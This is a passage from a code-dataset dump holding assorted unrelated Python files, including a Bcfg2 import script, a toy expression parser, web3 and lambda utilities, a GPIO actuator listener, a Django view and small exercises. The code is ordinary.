else:\n mperf = Performance(metric=metric, value=value)\n mperf.save()\n mperfs.append(mperf)\n current_interaction.performance_items.add(*mperfs)\n\n\nif __name__ == '__main__':\n from sys import argv\n verb = 0\n cpath = \"/etc/bcfg2.conf\"\n clientpath = False\n statpath = False\n syslog = False\n\n try:\n opts, args = getopt(argv[1:], \"hvudc:s:CS\", [\"help\",\n \"verbose\",\n \"updates\",\n \"debug\",\n \"clients=\",\n \"stats=\",\n \"config=\",\n \"syslog\"])\n except GetoptError:\n mesg = sys.exc_info()[1]\n # print help information and exit:\n print(\"%s\\nUsage:\\nimportscript.py [-h] [-v] [-u] [-d] [-S] [-C bcfg2 config file] [-s statistics-file]\" % (mesg))\n raise SystemExit(2)\n\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n print(\"Usage:\\nimportscript.py [-h] [-v] -s \\n\")\n print(\"h : help; this message\")\n print(\"v : verbose; print messages on record insertion/skip\")\n print(\"u : updates; print status messages as items inserted semi-verbose\")\n print(\"d : debug; print most SQL used to manipulate database\")\n print(\"C : path to bcfg2.conf config file.\")\n print(\"s : statistics.xml file\")\n print(\"S : syslog; output to syslog\")\n raise SystemExit\n if o in [\"-C\", \"--config\"]:\n cpath = a\n\n if o in (\"-v\", \"--verbose\"):\n verb = 1\n if o in (\"-u\", \"--updates\"):\n verb = 2\n if o in (\"-d\", \"--debug\"):\n verb = 3\n if o in (\"-c\", \"--clients\"):\n print(\"DeprecationWarning: %s is no longer used\" % o)\n\n if o in (\"-s\", \"--stats\"):\n statpath = a\n if o in (\"-S\", \"--syslog\"):\n syslog = True\n\n logger = logging.getLogger('importscript.py')\n logging.getLogger().setLevel(logging.INFO)\n Bcfg2.Logger.setup_logging('importscript.py',\n True,\n syslog, level=logging.INFO)\n\n cf = ConfigParser.ConfigParser()\n cf.read([cpath])\n\n if not statpath:\n try:\n statpath = \"%s/etc/statistics.xml\" % cf.get('server', 'repository')\n except (ConfigParser.NoSectionError, ConfigParser.NoOptionError):\n print(\"Could not read bcfg2.conf; exiting\")\n raise SystemExit(1)\n try:\n statsdata = XML(open(statpath).read())\n except (IOError, XMLSyntaxError):\n print(\"StatReports: Failed to parse %s\" % (statpath))\n raise SystemExit(1)\n\n try:\n encoding = cf.get('components', 'encoding')\n except:\n encoding = 'UTF-8'\n\n q = '-O3' in sys.argv\n\n # don't load this at the top. causes a circular import error\n from Bcfg2.Server.SchemaUpdater import update_database, UpdaterError\n # Be sure the database is ready for new schema\n try:\n update_database()\n except UpdaterError:\n raise SystemExit(1)\n load_stats(statsdata,\n encoding,\n verb,\n logger,\n quick=q,\n location=platform.node())\n","sub_path":"src/lib/Bcfg2/Server/Reports/importscript.py","file_name":"importscript.py","file_ext":"py","file_size_in_byte":13100,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"638453508","text":"from sys import argv, exit\nfrom time import time\nfrom hParsing import *\nfrom L5_special import *\nfrom L5_matrices import *\n\nvar = {\"id\":[0,\"num.int\"]}\nexpr = {}\ntemp_var = {}\n# ------\n# SYMBOLS\npfx = [chr(402),\"$\",\"@\",\"..\"]\nop = [\"+\",\"-\",\"*\",\"/\",\"%\",\"^\"]\nparens = [\"(\",\")\",\"[\",\"]\",\"{\",\"}\"]\nseparators = pfx+op+parens+[\",\",\"\\\"\",\"=\",\"|\",\";\"]\nifx = {\"plus\":\"x + y\"}\n# ------\n# GLOBAL VARIABLES\npfile = False\npexpr = False\nprange = False\nctype = \"NULL.NULL\"\n# ------\n# INNER GLOBAL VARIABLES\ndT = False # displayTypes\nt = False\n# ------\n\ndef Parse(code):\n ph = Phrase(code)\n ret = []\n while True:\n if ph.tokn == \"EoF\":\n break\n elif ph.tokn == \"\\n\": ph.nextToken()\n else: ret.append(Expression(ph))\n return ret\n\ndef Expression(ph):\n global pexpr,dT,t\n if ph.tokn == \"$\":\n ph.nextToken()\n pexpr = True\n if pfile:\n if ph.tokn.isalpha() or ph.tokn or prange == \"@\":\n pass\n else: handleError(ph,\"Syntax\",\"Expected declarations not found\",pfile)\n ret = Operation(ph, 0)\n if ph.tokn == \"@\":\n ph.expect(\"@\")\n if ph.tokn == \"@\": # @@Assert Statement\n ph.nextToken()\n while ph.tokn == \"-\":\n ph.nextToken()\n if ph.tokn == \"showTypes\": dT = not dT\n elif ph.tokn == \"showTime\": t = not t\n elif ph.tokn == \"exit\": exit()\n ph.nextToken()\n else: # @Print Statement\n obj = str(Operation(ph,0))\n while ph.tokn == \",\":\n ph.nextToken()\n if ph.tokn == \",\":\n obj+= \" \"\n ph.nextToken\n else: obj+= str(Operation(ph,0))\n if pexpr: ret = \"@\"+obj\n else: ret = obj\n elif ph.tokn == \"=\":\n # Variable declaration\n ph.nextToken()\n name = ret\n if pexpr:\n expr[name] = [Operation(ph,0),ctype]\n ret = name+\" = \"+expr[name][0]\n else:\n if prange: temp_var[name] = [Operation(ph,0),ctype]\n else: var[name] = [Operation(ph,0),ctype]\n ret = \"\"\n if not pfile or dT:\n ret=name+\" <- \"\n if name in temp_var: ret+=\"|\"+str(temp_var[name][0])\n else: ret+=str(var[name][0])\n if dT: ret+=(\" : [\"+ctype+\"]\\n\")\n if prange: ret = \";@!;\"\n pexpr = False\n return ret\n\ndef Operation(ph, order):\n global ctype\n if order == 0:\n if ph.tokn == \"-\": # Handle unary minus\n ph.nextToken()\n ret = \"\"\n obj = Operation(ph, order+1)\n if dT: print(ret,atype,op,obj,ctype)\n if prefix(ctype) == \"num\": ret = -obj\n else: handleError(ph,\"Type\",\"Unary - not supported for \"+ctype,pfile)\n else: ret = Operation(ph, order+1)\n while ph.tokn in [\"+\",\"-\"]:\n op,atype = ph.tokn,ctype\n ph.nextToken()\n if ph.tokn == \"|\": #FOLD\n ph.nextToken()\n obj = Operation(ph, order+1)\n if same_prefix(atype,ctype):\n if prefix(ctype) == \"rng\":\n if op == \"+\": ret = ret + obj\n else: ret = ret - obj\n else:\n if prefix(ctype) == \"rng\": # X +- {...}\n if op == \"+\": ret = [ret+i for i in obj]\n else: ret = [ret-i for i in obj]\n else:\n if ph.tokn == \"+\":\n ph.nextToken()\n obj = Operation(ph, order+1)\n \n else:\n obj = Operation(ph, order+1)\n if dT: print(ret,atype,op,obj,ctype)\n if same_prefix(atype, ctype):\n # N+N S+S\n if pexpr: ret = str(ret)+op+str(obj) \n elif op == \"+\": ret += obj\n else:\n if guess_prefixes(atype,ctype,\"str\",\"str\"):\n ret = ret.replace(obj,\"\")\n else: ret -= obj\n elif prefix(atype) == \"rng\": # {...} +- x\n if op == \"+\": ret.append(obj) # Act like append\n else:\n try: ret.remove(obj)\n except: pass\n else: handleError(ph,\"Type\",atype+op+ctype+\" invalid types for +-.\",pfile)\n elif order == 1:\n ret = Operation(ph, order+1)\n while ph.tokn in [\"*\", \"/\"]:\n op,atype = ph.tokn,ctype\n ph.nextToken()\n obj = Operation(ph, order+1)\n if dT: print(ret,atype,op,obj,ctype)\n if guess_prefixes(atype,ctype,\"num\",\"num\"):\n if pexpr: ret = str(ret)+op+str(obj) \n elif op == \"*\": ret = ret * obj\n else: ret = ret / obj\n elif guess_prefixes(atype,ctype,\"rng\",\"num\"):\n if prefix(atype) == \"rng\" and suffix(ctype) == \"int\":\n ret = ret * obj\n elif prefix(ctype) == \"rng\":\n if op == \"+\": ret = [ret*i for i in obj]\n else: ret = [ret/i for i in obj]\n else: handleError(ph,\"Type\",atype+op+ctype+\" invalid types for */.\",pfile)\n elif guess_suffixes(atype,ctype,\"int\",\"str\",\"chr\"):\n if pexpr: ret = ret+op+obj\n elif op == \"*\": ret = ret * obj\n else: handleError(ph,\"Type\",\n \"Division not supported for \"+atype+\" and \"+ctype, pfile)\n #ctype = \"str.str\" # str/chr * int or int * str/chr\n else: handleError(ph,\"Type\",atype+op+ctype+\" invalid types for */.\",pfile)\n elif order == 2:\n ret = Operation(ph, order+1)\n while ph.tokn == \"^\":\n op,atype = ph.tokn,ctype\n ph.nextToken()\n obj = Operation(ph, order)\n if dT: print(ret,atype,op,obj,ctype)\n if guess_suffixes(atype,ctype,\"int\",\"int\",\"float\",\"float\"):\n if pexpr: ret = str(ret)+op+str(obj) \n else: ret = ret**obj\n else: handleError(ph,\"Type\",\n \"Exponentiation not supported for \"+atype+\" and \"+ctype, pfile)\n elif order == 3:\n ret = Operation(ph, order+1)\n while ph.tokn == \"%\":\n op,atype = ph.tokn,ctype\n ph.nextToken()\n obj = Operation(ph, order+1)\n if guess_suffixes(atype,ctype,\"int\",\"int\"):\n ret = ret%obj\n else: handleError(ph,\"Type\",\n \"Modulus not supported for \"+atype+\" and \"+ctype, pfile)\n else:\n ret = Term(ph)\n return ret\n\ndef Term(ph):\n global ctype\n ret = \"\"\n if ph.tokn.replace(\".\",\"\").replace(\"-\",\"\").isdigit():\n ctype = \"num\" # Number\n if pexpr:\n ret = ph.tokn\n ctype = \"num.int\"\n elif \".\" in ph.tokn:\n ret = float(ph.tokn)\n ctype = \"num.float\"\n else:\n ret = int(ph.tokn)\n ctype = \"num.int\"\n ph.nextToken()\n elif ph.tokn == chr(402) or ph.tokn == \"fract\":\n ret = Fraction(ph)\n ctype = \"num.fract\"\n elif ph.tokn.isalpha():\n ret = Label(ph)\n elif ph.tokn == \"\\\"\":\n # String\n ctype = \"str.str\"\n ret = String(ph)\n elif ph.tokn == \"{\":\n ret = Range(ph)\n elif ph.tokn == \"(\":\n # Parenthesis\n ph.nextToken()\n ret = Operation(ph, 0)\n ph.expect(\")\")\n if pexpr: ret = \"(\"+ret+\")\"\n #if dT and ret != \"\": print(str(ret)+\" : [\"+ctype+\"]\")\n #if pexpr: ctype = \"str.expr\"\n return ret\n\ndef Label(ph):\n global ctype\n ret,name = \"\",ph.tokn\n ph.nextToken()\n if ph.tokn == \"=\": ret = name\n elif name in list(var.keys())+list(temp_var.keys()):\n if pexpr: ret = name\n if name in temp_var:\n if pexpr: ret = name\n ctype = temp_var[name][1]\n else:\n ret = var[name][0]\n ctype = var[name][1]\n elif name in expr:\n if pexpr: ret = name\n else:\n gcode = separate(expr[name][0],separators)\n gh = Phrase(gcode.split())\n ret = Operation(gh,0)\n ctype = expr[name][1]\n else: handleError(ph,\"Name\",\"Invalid identifier\",pfile)\n return ret\n\ndef String(ph):\n ph.nextToken()\n ret = \"\"\n while True:\n if ph.tokn == \"EoF\":\n ph.fatalError(\"Unmatching quotes\")\n elif ph.tokn == \"\\\"\": break\n else:\n if ph.tokn == \"\\\\\": ret+= \" \"\n else: ret+= ph.tokn\n ph.nextToken()\n ph.nextToken()\n if pexpr: ret = \"\\\"\"+ret+\"\\\"\"\n return ret\n\ndef Fraction(ph):\n ph.nextToken()\n ret = 0\n num = Term(ph)\n if ph.tokn == \"/\": ph.nextToken()\n elif ph.tokn == \",\": ph.nextToken()\n den = Term(ph)\n if prefix(ctype) == \"num\":\n if pexpr: ret = \"fract \"+num+\" \"+den\n else: ret = Fract(num,den)\n else: handleError(ph,\"Type\",\"Invalid fraction\",pfile)\n return ret\n\ndef Range(ph):\n global pexpr,prange,temp_var,ctype\n ph.nextToken()\n ret = []\n stack = []\n if ph.tokn.isalpha() and ph.tokn not in list(var.keys())+list(expr.keys()):\n # {x in Range | ...}\n temp = ph.tokn\n ph.nextToken()\n if ph.tokn == \"in\": ph.nextToken()\n else:\n ph.expect(\"-\")\n ph.expect(\">\")\n stack = Range(ph)\n ph.expect(\"|\")\n temp_var[temp] = [0, complete_prefix(suffix(ctype))]\n while True:\n if ph.tokn in [\"EoF\",\"}\"]: break\n else:\n pexpr = True\n ret.append(Expression(ph))\n if ph.tokn in [\",\",\";\",\"|\"]:\n ph.nextToken()\n pexpr = False\n wret = Rng([])\n for obj in stack:\n for instruction in ret:\n gcode = separate(str(instruction), separators)\n gcode = gcode.replace(temp,str(obj))\n prange = True\n f = Expression(Phrase(gcode.split()))\n if f != \";@!;\": wret.append(f)\n prange = False\n temp_var = {}\n ret = wret\n else:\n # {a,b,c,d...}\n stack.append(Operation(ph,0))\n if ph.tokn in [\"to\",\"..\"] and prefix(ctype) == \"num\":\n ph.nextToken()\n # {a to b} or {a..b}\n stack.append(Operation(ph,0))\n ret = list(range(min(stack),max(stack)))\n if stack[0] == max(stack): # The list is reversed\n ret = ret[::-1]\n else:\n while True:\n if ph.tokn in [\"EoF\",\"}\"]: break\n elif ph.tokn == \",\": ph.nextToken()\n else: stack.append(Operation(ph,0))\n ret = Rng(stack)\n ctype = \"rng.\"+suffix(ctype)\n ph.expect(\"}\")\n return ret\n\n \nif len(argv) > 1:\n pfile = True\n # Handle whitespace\n code = readFile(argv[1]).replace(\"\\\" \\\"\",\"\\\"\\\\\\\"\")\n code = separate(code, separators)\n g = Parse(code.split())\n print(\"\".join(str(s) for s in g))\nelse:\n while True:\n code = str(input(\"> \"))\n if code == \"\\\\e\":break\n elif code != \"\":\n code = code.replace(\"\\\" \\\"\",\"\\\"\\\\\\\"\")\n code = separate(code,separators)\n p = time()\n g = (Parse(code.split()))\n print(\"\".join(str(s) for s in g))\n if t: print(\"[Time elapsed: \"+str(time()-p)+\"s]\")","sub_path":"Prototypes/L5/Px/L5Px.py","file_name":"L5Px.py","file_ext":"py","file_size_in_byte":11587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"143043830","text":"import json\nimport datetime\nimport decimal\nimport requests\nimport web3\nfrom web3 import Web3\nIGNORED_LIST = ['row_id', 'row_created', 'row_updated']\n\n\nclass Utils:\n def __init__(self):\n self.msg_type = {\n 0: 'info:: ',\n 1: 'err:: '\n }\n\n def report_slack(self, type, slack_msg, SLACK_HOOK):\n url = SLACK_HOOK['hostname'] + SLACK_HOOK['path']\n prefix = self.msg_type.get(type, \"\")\n print(url)\n payload = {\"channel\": \"#contract-index-alerts\",\n \"username\": \"webhookbot\",\n \"text\": prefix + slack_msg,\n \"icon_emoji\": \":ghost:\"\n }\n\n resp = requests.post(url=url, data=json.dumps(payload))\n print(resp.status_code, resp.text)\n\n def clean(self, value_list):\n for value in value_list:\n self.clean_row(value)\n\n def clean_row(self, row):\n for item in IGNORED_LIST:\n del row[item]\n\n for key in row:\n if isinstance(row[key], decimal.Decimal) or isinstance(row[key], datetime.datetime):\n row[key] = str(row[key])\n elif isinstance(row[key], bytes):\n if row[key] == b'\\x01':\n row[key] = 1\n elif row[key] == b'\\x00':\n row[key] = 0\n else:\n raise Exception(\"Unsupported bytes object. Key \" +\n str(key) + \" value \" + str(row[key]))\n\n return row\n\n def remove_http_https_prefix(self, url):\n url = url.replace(\"https://\", \"\")\n url = url.replace(\"http://\", \"\")\n return url\n\n def get_current_block_no(self, ws_provider):\n w3Obj = Web3(web3.providers.WebsocketProvider(ws_provider))\n return w3Obj.eth.blockNumber\n\n\ndef make_response(status_code, body, header=None):\n return {\n \"statusCode\": status_code,\n \"headers\": header,\n \"body\": body\n }\n\n\ndef validate_dict(data_dict, required_keys):\n for key in required_keys:\n if key not in data_dict:\n return False\n return True\n\n\ndef generate_lambda_response(status_code, message):\n return {\n 'statusCode': status_code,\n 'body': json.dumps(message),\n 'headers': {\n 'Content-Type': 'application/json',\n \"X-Requested-With\": '*',\n \"Access-Control-Allow-Headers\": 'Access-Control-Allow-Origin, Content-Type,X-Amz-Date,Authorization,X-Api-Key,x-requested-with',\n \"Access-Control-Allow-Origin\": '*',\n \"Access-Control-Allow-Methods\": 'GET,OPTIONS,POST'\n }\n }\n\n\ndef extract_payload(method, event):\n method_found = True\n payload_dict = None\n if method == 'POST':\n payload_dict = json.loads(event['body'])\n elif method == 'GET':\n payload_dict = event.get('queryStringParameters', {})\n else:\n method_found = False\n return method_found, payload_dict\n\n\ndef format_error_message(status, error, resource, payload, net_id):\n return json.dumps(\n {'status': status, 'error': error, 'resource': resource, 'payload': payload, 'network_id': net_id})\n","sub_path":"common/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"477210647","text":"import random\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\ndef apply_motion(d, stepsize):\n d[0] += d[2] * stepsize\n d[1] += d[3] * stepsize\n d[2] = max(-1.4, min(1.4, d[2] + random.gauss(0, stepsize)))\n d[3] = max(-1.4, min(1.4, d[3] + random.gauss(0, stepsize)))\n\ndef gen_data(filename, size=3000):\n start = np.array([0.0, 0.0, 0.0, 0.0])\n data = np.zeros((size, 4))\n data[0, :] = start\n maxdist = 0.01\n for i in range(1, size):\n apply_motion(start, 0.1)\n data[i, :] = start\n dist = np.linalg.norm(data[i-1, [0, 1]] - data[i, [0,1]])\n maxdist = max(maxdist, dist)\n plt.plot(data[[i-1, i], 0], data[[i-1, i], 1], color=(dist/maxdist, 1-(dist/maxdist), 0))\n plt.show()\n df = pd.DataFrame(data[:, [0,1]], columns=['x', 'y'])\n df.to_csv(filename)\n\ndef read_walk(filename):\n df = pd.read_csv(filename)\n plt.plot(df[['noisex']], df[['noisey']], color='r')\n plt.plot(df[['estx']], df[['esty']], color='b')\n plt.plot(df[['realx']], df[['realy']], color='g')\n plt.show()\n\nif __name__ == '__main__':\n gen_data('out-walk.csv')\n","sub_path":"generatewalk.py","file_name":"generatewalk.py","file_ext":"py","file_size_in_byte":1133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"93672146","text":"# Randomisation\nimport random\n\nrandom_int = random.randint(1, 10) #gives a random integer between the given range\nprint(random_int)\n\nrandom_float = random.random() # random floating numbers between 0.9999999 - 0.9999999\nprint(random_float)\n\nrandom_float * 5 # random floating numbers between 0.9999999 - 4.9999999\n\n# Lists\n# A data structure, widely used.\nfruits = [\"Apple\", \"Pear\", \"Mango\"]\n\n# index starts with 0\nprint(fruits[0])\n\n# -1 will point to the last item\nprint(fruits[-1])\n\n# Reassign items\nfruits[1] = \"Orange\"\n\n# Add items in the end\nfruits.append(\"Banana\")\n\n# nested lists\nvegetables = [\"Spinach\", \"Tomatoes\", \"Celery\", \"Potatoes\"]\n\nnew_list = [fruits, vegetables]\n","sub_path":"Day_4/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"337507215","text":"import time\nimport network_management.socket_manager as sm\nfrom EmulatorGUI import GPIO\nGPIO.setmode(GPIO.BCM)\nGPIO.setwarnings(False)\n\nGPIO.setup(11, GPIO.OUT, initial=GPIO.LOW)\n\n\n\nusername = \"remote_hub_actuator\"\nclient_socket = sm.get_socket()\n\n# register socket with transport layer\nregistered = False\nwhile not registered:\n registered = sm.register(username, client_socket)\n if not registered:\n print(\"Registration attempt failed\")\n time.sleep(1) # this might need better handling as currently it just\n # spams the network every second\n\n#messaging loop\nwhile True:\n # receive result, which is a list in the format [result_code, message]\n result = sm.receive_message(client_socket)\n \n result_code = result[0]\n result_message = result[1]\n # result code 'OK' indicates a message was successfully received\n if result_code == 'OK':\n message = result[1]\n print(message)\n\n if result_message == \"b'ON'\":\n GPIO.output(11, GPIO.HIGH)\n elif result_message == \"b'OFF'\":\n GPIO.output(11, GPIO.LOW)\n\n #GPIO.cleanup()\n\n \n \n \n\n # Other result codes you might want to handle for:\n # 'INVALID_HEADER' (This would indicate there is something wrong with the\n # network_config or socket_manager scripts)\n # 'NO_MESSAGES' (This is an error you'll get whenever there's no messages\n # and it probably doesn't need handling as long as your\n # receive loop keeps running)\n # 'ERROR' (This is if something inexplicably goes wrong)\n","sub_path":"actuator_remote_hub.py","file_name":"actuator_remote_hub.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"458306011","text":"import collections\n\n\nclass Solution:\n def checkIfCanBreak(self, s1: str, s2: str) -> bool:\n a1 = sorted([c for c in s1])\n a2 = sorted([c for c in s2])\n check = 0\n for i in range(len(a1)):\n if a1[i] == a2[i]:\n continue\n if check == 0:\n check = 1 if a1[i] > a2[i] else -1\n else:\n check2 = 1 if a1[i] > a2[i] else -1\n if check * check2 == -1:\n return False\n return True\n\n\ns = Solution()\nprint(s.checkIfCanBreak('abe', 'acd'))\n","sub_path":"leetcode/2020/checkIfCanBreak.py","file_name":"checkIfCanBreak.py","file_ext":"py","file_size_in_byte":573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"226387368","text":"import numpy as np\n\n\ndef EO0(pop, test_func, rt):\n m = pop.shape[0]\n tt = np.diag(np.ones(m))\n temp = np.tile(pop, (m, 1)).T\n step_rd = np.random.normal(0, rt, (m, 1))\n tt *= step_rd\n temp += tt\n temp[temp > 1] = 1\n temp[temp < 0] = 0\n F = test_func.Func(temp)\n j = np.argmin(F)\n best = temp[:, j]\n if test_func.Func(best) < test_func.Func(pop):\n pop[:] = best[:]\n return pop\n","sub_path":"strategy/EO.py","file_name":"EO.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"589222112","text":"from django.shortcuts import redirect, render\n\nfrom ...forms import ArtistForm\nfrom ...models import Artist\n\n__all__ = (\n 'artist_add',\n)\n\n\ndef artist_add(request):\n # HTML에 Artist클래스가 받을 수 있는 모든 input 을 구현\n # img_profile은 제외\n # method가 POST면 request.POST에서 해당 데이터 처리\n # 새 Artist객체를 만들고 artist_list로 이동\n # method가 GET이면 artist_add.html을 표\n\n # ** 생년월일은 YYYY-MM-DD 형식으로 받음\n # 이후 datetiem,.strptime을 사용해서 date 객체로 변환\n\n # 1. artist_add.html 작성\n # 2. url과 연결, ./artist/add/ 에 매핑\n # 3. Get 요청시 잘 되는지 확인\n # 4. form method설정 후 POST요청시 artist_add() view에서 분기\n # 5. POST요청의 값이 request.POST 에 잘 오는지 확인\n # 6. request.POST에 담긴 값을 사용해 Artist인스턴스 생성\n # 7. 생성 완료 후 'artist:artist-list' URL name에 해당하는 view로 이동\n\n if request.method == 'POST':\n # multipart/form-data로 전달된 파일은\n # request.FILES 속성에 들어있음\n\n form = ArtistForm(request.POST, request.FILES)\n if form.is_valid():\n form.save()\n return redirect('artist:artist-list')\n else:\n form = ArtistForm()\n\n context = {\n 'artist_form': form,\n }\n return render(request, 'artist/artist_add.html', context)\n","sub_path":"app/artist/views/artist/add.py","file_name":"add.py","file_ext":"py","file_size_in_byte":1455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"577180813","text":"import subprocess\nimport os\n\n\n\"\"\"\nSimple Subprocess Exercise: Folder Files\nCreate a new text file for each directory with filename of the files as the\ncontent. (filename: directoryName.txt)\nFolder : Notes\n\"\"\"\np = os.path.join(os.getcwd(), 'Notes')\nos.chdir(p)\nfor d in os.listdir(p):\n dp = os.path.join(p, d)\n if os.path.isdir(dp):\n os.chdir(dp)\n files = [f.name for f in os.scandir()]\n _file = os.path.join(p, d+'.txt')\n for f in files:\n fp = open(_file, 'a+')\n subprocess.run(['echo', f], stdout = fp)\n","sub_path":"D13/subprocess/diana.py","file_name":"diana.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"432330173","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport math\nfrom coeffs import *\n\n#setting up plot\nfig = plt.figure()\nax = fig.add_subplot(111, aspect='equal')\n\nlrct = 3\nlen=100\ny = np.linspace(-5,5,len)\nx = np.power(y,2)/3\nP1 = np.vstack((x,y))\nx_par1 = P1\nplt.plot(x_par1[0,:],x_par1[1,:],label=\"Parabola1\")\n\nx = np.linspace(-5,5,len)\ny = np.power(x,2)/3\nP2 = np.vstack((x,y))\nx_par2 = P2\nplt.plot(x_par2[0,:],x_par2[1,:],label=\"Parabola2\")\n\nD = np.array([-3/8,-3/8])\nm = np.array([1,-1])\nT = line_dir_pt(m,D,-5,5)\n\nplt.plot(T[0,:],T[1,:],label='Common Tangent' )\n\nax.plot()\nplt.xlabel('$x$')\nplt.ylabel('$y$')\nplt.legend(loc='best')\nplt.axis('equal')\nplt.grid()\nplt.show()\n","sub_path":"ex-con1.py","file_name":"ex-con1.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"179605127","text":"#!/usr/bin/env python\n# coding: utf-8\n\n\nimport json\n\nlabels = ['file', 'type']\n\nwith open('/home/user/notebooks/Work/Waste_management_data/list_of_containers.json', 'r') as f:\n file = json.load(f)\n\nfor num, i in enumerate(file):\n try:\n container_type = str(tuple(tuple(i.values())[0]['containers'].values())[0]['type_id'])\n except AttributeError:\n container_type = '0'\n \n labels.append([tuple(i.keys())[0], container_type])\n\nlabels = sorted(labels, key=lambda x: x[0])\nlabels = '\\n'.join([','.join(i) for i in labels])\n\nwith open('/home/user/notebooks/Work/Waste_management_data/annot.csv', 'w') as f:\n f.write(labels)\n","sub_path":"images_creating2.py","file_name":"images_creating2.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"240859580","text":"#!/usr/bin/python\n# coding=utf-8\nimport os\nnew = \"\"\npath = \"/home/ana/PS2/praticandoOBI/praticandoOBI/scripts/criajson/enunciados/\"\nfor filename in os.listdir(path):\n\tprint (filename)\n\tfor filename1 in os.listdir(path+filename):\n\t\tprint (filename1)\n\t\tpath2 = path+filename+\"/\"+filename1+\"/\"\n\t\tfor filename2 in os.listdir(path2):\n\t\t\tprint (filename2)\n\t\t\twith open(path2+filename2) as f:\n\t\t\t\twith open(path2+filename2, \"w\") as f1:\n\t\t\t\t\ttitulo = f.readline()\n\t\t\t\t\tprint(titulo)\n\t\t\t\t\tf1.write(titulo)\n\t\t\t\t\twhile True:\n\t\t\t\t\t\tnew = f.readline().replace('\\n','')\n\t\t\t\t\t\tprint(new)\n\t\t\t\t\t\tf1.write(new)\n\t\t\t\t\t\tif not new:\n\t\t\t\t\t\t\tbreak\n\t\t\t\n\t\t\t#\tf1.write(titulo)\n\t\t\t#\tf1.write(new)\n\n\n","sub_path":"praticandoOBI/scripts/provas/espacos.py","file_name":"espacos.py","file_ext":"py","file_size_in_byte":671,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"514800900","text":"import logging\n\nfrom aiohttp import ClientSession, web\n\nfrom ..conf import permissions_url\nfrom ..utils.json import jsonb\n\nLOG = logging.getLogger(__name__)\n\ndef filter_hstore(hstores, schema_name):\n for hstore in hstores:\n v = hstore.get(schema_name, None)\n if v is not None:\n yield jsonb(v)\n\n\nasync def resolve_token(token, requested_datasets):\n # If the user is not authenticated (ie no token)\n # we pass (requested_datasets, False) to the database function: it will filter out the datasets list, with the public ones\n if token is None:\n return requested_datasets, False\n\n # Otherwise, we have a token and resolve the datasets with the permissions server\n # The permissions server will:\n # * filter out the datasets list, with the ones the user has access to\n # * return _all_ the datasets the user has access to, in case the datasets list is empty\n async with ClientSession() as session:\n async with session.post(\n permissions_url,\n headers = { 'Authorization': 'Bearer ' + token,\n 'Accept': 'application/json'},\n json = { 'datasets': list(requested_datasets) }, # will set the Content-Type to application/json\n ) as resp:\n if resp.status > 200:\n LOG.error('Permissions server error %d', resp.status)\n error = await resp.text()\n LOG.error('Error: %s', error)\n raise web.HTTPUnauthorized(reason=error)\n \n authorized_datasets = await resp.json()\n return authorized_datasets, True\n\n","sub_path":"beacon/utils/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"2780719","text":"from AccessControl import ClassSecurityInfo\nfrom Products.ATContentTypes.content import schemata\nfrom Products.Archetypes import atapi\nfrom Products.Archetypes.ArchetypeTool import registerType\nfrom Products.CMFCore import permissions\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.CMFPlone.utils import _createObjectByType\nfrom Products.Five.browser.pagetemplatefile import ViewPageTemplateFile\nfrom bika.lims.browser import BrowserView\nfrom bika.lims.browser.bika_listing import BikaListingView\nfrom bika.lims.config import PROJECTNAME\nfrom bika.lims import bikaMessageFactory as _\nfrom bika.lims.utils import t\nfrom bika.lims.utils import tmpID\nfrom plone.app.layout.globals.interfaces import IViewView\nfrom bika.lims.content.bikaschema import BikaFolderSchema\nfrom plone.app.content.browser.interfaces import IFolderContentsView\nfrom plone.app.folder.folder import ATFolder, ATFolderSchema\nfrom zope.interface.declarations import implements\nfrom bika.lims.interfaces import IStorageLevels\n\nclass StorageLevelsView(BikaListingView):\n template = ViewPageTemplateFile('templates/storagelevels.pt')\n implements(IFolderContentsView, IViewView)\n\n def __init__(self, context, request):\n super(StorageLevelsView, self).__init__(context, request)\n path = '/'.join(self.context.getPhysicalPath())\n self.catalog = 'bika_setup_catalog'\n self.contentFilter = {'portal_type': 'StorageLevel',\n 'sort_on': 'sortable_title',\n 'path': {'query': path, 'depth': 1}}\n self.context_actions = {_('Add'):\n {'url': 'createObject?type_name=StorageLevel',\n 'icon': '++resource++bika.lims.images/add.png'}}\n self.title = (hasattr(self.context, 'Title') and self.context.Title() or\n self.context.translate(_(\"Storage Levels\")))\n self.icon = self.portal_url\n self.icon += \"/++resource++bika.lims.images/storagelocation_big.png\"\n self.description = \"\"\n self.show_sort_column = False\n self.show_select_row = False\n self.show_select_column = True\n self.pagesize = 25\n\n self.columns = {\n 'Title': {'title': _('Title'),\n 'index': 'sortable_title'},\n 'Description': {'title': _('Description'),\n 'toggle': True},\n 